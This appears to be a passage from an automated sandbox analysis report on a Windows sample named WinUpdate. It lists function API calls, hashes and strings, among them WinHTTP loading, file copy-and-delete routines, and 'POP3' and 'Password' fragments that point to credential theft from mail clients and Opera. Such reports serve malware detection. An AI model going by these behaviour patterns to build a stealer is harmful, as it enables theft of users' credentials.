                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_10000000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CloseFileFind$CreateFirstHandle
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3283578348-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 59a1705bc7755bb769e0b5acb170d7105e02174513c7add7ae537a9481892608
                                                                                                                                                                                                                                                                                                • Instruction ID: e7c7038f638e567c979eff5cb874745e3cf8d5b40648ff69d52a7e1f1d2920ba
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 59a1705bc7755bb769e0b5acb170d7105e02174513c7add7ae537a9481892608
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5781C370D00209EAFB10CFA4CC84BEEBBB9FF14394F610519E809E7294D775AA45CB61
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • LoadLibraryW.KERNEL32(winhttp.dll,?,10002B6F), ref: 10007316
                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,WinHttpOpen), ref: 10007333
                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,WinHttpConnect), ref: 10007340
                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,WinHttpOpenRequest), ref: 1000734D
                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,WinHttpSendRequest), ref: 1000735A
                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,WinHttpReceiveResponse), ref: 10007367
                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,WinHttpQueryDataAvailable), ref: 10007374
                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,WinHttpReadData), ref: 10007381
                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,WinHttpCloseHandle), ref: 1000738E
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.4592506553.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592466588.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592797955.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_10000000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                                                                                                                • String ID: WinHttpCloseHandle$WinHttpConnect$WinHttpOpen$WinHttpOpenRequest$WinHttpQueryDataAvailable$WinHttpReadData$WinHttpReceiveResponse$WinHttpSendRequest$winhttp.dll
                                                                                                                                                                                                                                                                                                • API String ID: 2238633743-1483618772
                                                                                                                                                                                                                                                                                                • Opcode ID: 38b6a5f0677133c9a3ca117cc90bcc93c37312f047caed2b466f28f2473e8c26
                                                                                                                                                                                                                                                                                                • Instruction ID: e8a3204d4a55cb4efda40a2bc34e722aa0141a8d0c6d521df876b84b5db0583d
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 38b6a5f0677133c9a3ca117cc90bcc93c37312f047caed2b466f28f2473e8c26
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 88115430C1133896F760EBB5AC98F67BEECEB41684F60021BF504521A4D7B85587DF50
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 02E61CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 02E61D1B
                                                                                                                                                                                                                                                                                                  • Part of subcall function 02E61CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 02E61D37
                                                                                                                                                                                                                                                                                                  • Part of subcall function 02E61CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 02E61D4B
                                                                                                                                                                                                                                                                                                • _strlen.LIBCMT ref: 02E61855
                                                                                                                                                                                                                                                                                                • _strlen.LIBCMT ref: 02E61869
                                                                                                                                                                                                                                                                                                • _strlen.LIBCMT ref: 02E6188B
                                                                                                                                                                                                                                                                                                • _strlen.LIBCMT ref: 02E618AE
                                                                                                                                                                                                                                                                                                • _strlen.LIBCMT ref: 02E618C8
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.4591274972.0000000002E61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4591212270.0000000002E60000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4591274972.0000000002E76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_2e60000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: _strlen$File$CopyCreateDelete
                                                                                                                                                                                                                                                                                                • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                                                                                                                                                                                                                                                                                • API String ID: 3296212668-3023110444
                                                                                                                                                                                                                                                                                                • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                                                                                                                                                                                                                                • Instruction ID: d5d8a7b32e4e5fd9bef09bfa26c4ca65589a29066082e20deb86a35d3c59ae02
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FF613971DC0218ABEF16DBA4C848BFEB7B6AF05388F04E456E508AB350DB705A45CF55
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.4591274972.0000000002E61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4591212270.0000000002E60000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4591274972.0000000002E76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_2e60000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: _strlen
                                                                                                                                                                                                                                                                                                • String ID: %m$~$Gon~$~F@7$~dra
                                                                                                                                                                                                                                                                                                • API String ID: 4218353326-230879103
                                                                                                                                                                                                                                                                                                • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                                                                                                                                                                                                                                • Instruction ID: a4f15146d5738c7f23403a2899bd9079be36048bf8330e17fae3de56ee1e51e5
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B4712BB1D802685BCF22ABB48C98AFF7BFD9F05384F149096E548D7241E6749745CF60
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • ___free_lconv_mon.LIBCMT ref: 1001A0C9
                                                                                                                                                                                                                                                                                                  • Part of subcall function 1001CB97: _free.LIBCMT ref: 1001CBB4
                                                                                                                                                                                                                                                                                                  • Part of subcall function 1001CB97: _free.LIBCMT ref: 1001CBC6
                                                                                                                                                                                                                                                                                                  • Part of subcall function 1001CB97: _free.LIBCMT ref: 1001CBD8
                                                                                                                                                                                                                                                                                                  • Part of subcall function 1001CB97: _free.LIBCMT ref: 1001CBEA
                                                                                                                                                                                                                                                                                                  • Part of subcall function 1001CB97: _free.LIBCMT ref: 1001CBFC
                                                                                                                                                                                                                                                                                                  • Part of subcall function 1001CB97: _free.LIBCMT ref: 1001CC0E
                                                                                                                                                                                                                                                                                                  • Part of subcall function 1001CB97: _free.LIBCMT ref: 1001CC20
                                                                                                                                                                                                                                                                                                  • Part of subcall function 1001CB97: _free.LIBCMT ref: 1001CC32
                                                                                                                                                                                                                                                                                                  • Part of subcall function 1001CB97: _free.LIBCMT ref: 1001CC44
                                                                                                                                                                                                                                                                                                  • Part of subcall function 1001CB97: _free.LIBCMT ref: 1001CC56
                                                                                                                                                                                                                                                                                                  • Part of subcall function 1001CB97: _free.LIBCMT ref: 1001CC68
                                                                                                                                                                                                                                                                                                  • Part of subcall function 1001CB97: _free.LIBCMT ref: 1001CC7A
                                                                                                                                                                                                                                                                                                  • Part of subcall function 1001CB97: _free.LIBCMT ref: 1001CC8C
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 1001A0BE
                                                                                                                                                                                                                                                                                                  • Part of subcall function 10015A65: RtlFreeHeap.NTDLL(00000000,00000000,?,1001CD2C,?,00000000,?,00000000,?,1001CD53,?,00000007,?,?,1001A21D,?), ref: 10015A7B
                                                                                                                                                                                                                                                                                                  • Part of subcall function 10015A65: GetLastError.KERNEL32(?,?,1001CD2C,?,00000000,?,00000000,?,1001CD53,?,00000007,?,?,1001A21D,?,?), ref: 10015A8D
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 1001A0E0
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 1001A0F5
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 1001A100
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 1001A122
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 1001A135
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 1001A143
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 1001A14E
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 1001A186
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 1001A18D
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 1001A1AA
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 1001A1C2
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.4592506553.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592466588.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592797955.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_10000000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 161543041-0
                                                                                                                                                                                                                                                                                                • Opcode ID: be70f43cd3f780db0588d603a309c755db6f60602458a46c6275e532dd52c23e
                                                                                                                                                                                                                                                                                                • Instruction ID: 644937dc1452572f85b35f0ffe035dbca8845510b282740a5666290ef4fc3b73
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: be70f43cd3f780db0588d603a309c755db6f60602458a46c6275e532dd52c23e
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 09315736600601EFEB21CA78D885B4A73E8EF46391F994519E499DE151DF36FDC08A21
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • ___free_lconv_mon.LIBCMT ref: 02E67D06
                                                                                                                                                                                                                                                                                                  • Part of subcall function 02E690BA: _free.LIBCMT ref: 02E690D7
                                                                                                                                                                                                                                                                                                  • Part of subcall function 02E690BA: _free.LIBCMT ref: 02E690E9
                                                                                                                                                                                                                                                                                                  • Part of subcall function 02E690BA: _free.LIBCMT ref: 02E690FB
                                                                                                                                                                                                                                                                                                  • Part of subcall function 02E690BA: _free.LIBCMT ref: 02E6910D
                                                                                                                                                                                                                                                                                                  • Part of subcall function 02E690BA: _free.LIBCMT ref: 02E6911F
                                                                                                                                                                                                                                                                                                  • Part of subcall function 02E690BA: _free.LIBCMT ref: 02E69131
                                                                                                                                                                                                                                                                                                  • Part of subcall function 02E690BA: _free.LIBCMT ref: 02E69143
                                                                                                                                                                                                                                                                                                  • Part of subcall function 02E690BA: _free.LIBCMT ref: 02E69155
                                                                                                                                                                                                                                                                                                  • Part of subcall function 02E690BA: _free.LIBCMT ref: 02E69167
                                                                                                                                                                                                                                                                                                  • Part of subcall function 02E690BA: _free.LIBCMT ref: 02E69179
                                                                                                                                                                                                                                                                                                  • Part of subcall function 02E690BA: _free.LIBCMT ref: 02E6918B
                                                                                                                                                                                                                                                                                                  • Part of subcall function 02E690BA: _free.LIBCMT ref: 02E6919D
                                                                                                                                                                                                                                                                                                  • Part of subcall function 02E690BA: _free.LIBCMT ref: 02E691AF
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 02E67CFB
                                                                                                                                                                                                                                                                                                  • Part of subcall function 02E6571E: RtlFreeHeap.NTDLL(00000000,00000000,?,02E6924F,?,00000000,?,00000000,?,02E69276,?,00000007,?,?,02E67E5A,?), ref: 02E65734
                                                                                                                                                                                                                                                                                                  • Part of subcall function 02E6571E: GetLastError.KERNEL32(?,?,02E6924F,?,00000000,?,00000000,?,02E69276,?,00000007,?,?,02E67E5A,?,?), ref: 02E65746
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 02E67D1D
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 02E67D32
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 02E67D3D
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 02E67D5F
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 02E67D72
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 02E67D80
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 02E67D8B
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 02E67DC3
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 02E67DCA
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 02E67DE7
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 02E67DFF
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.4591274972.0000000002E61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4591212270.0000000002E60000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4591274972.0000000002E76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_2e60000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 161543041-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 2af2110fccb371743fb3673afc78c8c1a78b1f3d71a8d55460ba2d31c529e2a2
                                                                                                                                                                                                                                                                                                • Instruction ID: 029b25cc4cb400e65c2da6a492366af98dec292f85ea2bd752eed13d33e94df6
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2af2110fccb371743fb3673afc78c8c1a78b1f3d71a8d55460ba2d31c529e2a2
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 903110316C0209DFDB319A78D94CB76B7E6EF0239CF54E859E459D7590DB31A880CB10
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • PathFileExistsW.SHLWAPI(?,-00000002), ref: 100065F7
                                                                                                                                                                                                                                                                                                • PathFileExistsW.SHLWAPI(?,00000006), ref: 10006793
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.4592506553.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592466588.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592797955.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_10000000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ExistsFilePath
                                                                                                                                                                                                                                                                                                • String ID: (x86)$LocalAppData$ProgramFiles$\Opera$\Programs\Opera$opera.exe$opera.exe
                                                                                                                                                                                                                                                                                                • API String ID: 1174141254-3709686828
                                                                                                                                                                                                                                                                                                • Opcode ID: 20f353cdd1b36fb23e65d8c500ab5f414f4822a285356463df6aae757a0f072b
                                                                                                                                                                                                                                                                                                • Instruction ID: cd525ab1337c3ee21bd27d398b55dee76c9cea0ea90567e5fc089a1fee8f1736
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 20f353cdd1b36fb23e65d8c500ab5f414f4822a285356463df6aae757a0f072b
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5D917E74D20218AAEF00DFA4DC45BEEBBBAFF48744F204119F406E7295EB75A905CB51
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 10016970
                                                                                                                                                                                                                                                                                                  • Part of subcall function 10015A65: RtlFreeHeap.NTDLL(00000000,00000000,?,1001CD2C,?,00000000,?,00000000,?,1001CD53,?,00000007,?,?,1001A21D,?), ref: 10015A7B
                                                                                                                                                                                                                                                                                                  • Part of subcall function 10015A65: GetLastError.KERNEL32(?,?,1001CD2C,?,00000000,?,00000000,?,1001CD53,?,00000007,?,?,1001A21D,?,?), ref: 10015A8D
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 1001697C
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 10016987
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 10016992
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 1001699D
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 100169A8
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 100169B3
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 100169BE
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 100169C9
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 100169D7
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.4592506553.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592466588.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592797955.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_10000000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 5ceb0c3dd41d8749c3e5c53e13c3ee82ab575277eefb845cca99943617a416a4
                                                                                                                                                                                                                                                                                                • Instruction ID: 4486635b9f067f5c856a3a66de58a1cd354bc26f8124cf63660485fb98f8bcde
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5ceb0c3dd41d8749c3e5c53e13c3ee82ab575277eefb845cca99943617a416a4
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AC11447A550108FFCB01DF54C982CD93BA5EF08651F9D82A5F9498F622DA32EF909B81
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 02E659EA
                                                                                                                                                                                                                                                                                                  • Part of subcall function 02E6571E: RtlFreeHeap.NTDLL(00000000,00000000,?,02E6924F,?,00000000,?,00000000,?,02E69276,?,00000007,?,?,02E67E5A,?), ref: 02E65734
                                                                                                                                                                                                                                                                                                  • Part of subcall function 02E6571E: GetLastError.KERNEL32(?,?,02E6924F,?,00000000,?,00000000,?,02E69276,?,00000007,?,?,02E67E5A,?,?), ref: 02E65746
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 02E659F6
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 02E65A01
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 02E65A0C
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 02E65A17
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 02E65A22
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 02E65A2D
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 02E65A38
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 02E65A43
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 02E65A51
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.4591274972.0000000002E61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4591212270.0000000002E60000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4591274972.0000000002E76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_2e60000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 9323701dd1131fac7bc0efafb4c0607cadec403e021733ac4361edd4443cd1f4
                                                                                                                                                                                                                                                                                                • Instruction ID: b509cc1e1d176a2c61ebd504fedd00ff6409f641bc13df7b95dfd4f70fde81d7
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9323701dd1131fac7bc0efafb4c0607cadec403e021733ac4361edd4443cd1f4
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A411B97A69014DFFCB21EF54C849DED3F66EF04390B9990A1B9084F521DA31EA509F80
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.4592506553.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592466588.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592797955.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_10000000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: _free$EnvironmentVariable_wcschr
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 487594629-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 03c505302b217a881feeb7d46bad7d441065908759d7a5648ba0d5e2c1f84832
                                                                                                                                                                                                                                                                                                • Instruction ID: 24f0059e533d9f3fb59acd5008695e198d0c5eb1710b72595803e493e6dfdcaf
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 03c505302b217a881feeb7d46bad7d441065908759d7a5648ba0d5e2c1f84832
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D0616975904351ABD710DF78CC81A5EB7E4EF09760F5A426DF9419F2C1EA32E9818B90
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 02E61D1B
                                                                                                                                                                                                                                                                                                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 02E61D37
                                                                                                                                                                                                                                                                                                • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 02E61D4B
                                                                                                                                                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 02E61D58
                                                                                                                                                                                                                                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 02E61D72
                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 02E61D7D
                                                                                                                                                                                                                                                                                                • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 02E61D8A
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.4591274972.0000000002E61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4591212270.0000000002E60000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4591274972.0000000002E76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_2e60000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 1454806937-0
                                                                                                                                                                                                                                                                                                • Opcode ID: fd21c1a92f3b7df69a89b06200a1028984415a8e6ddb9e35e6d1f10bba0f3523
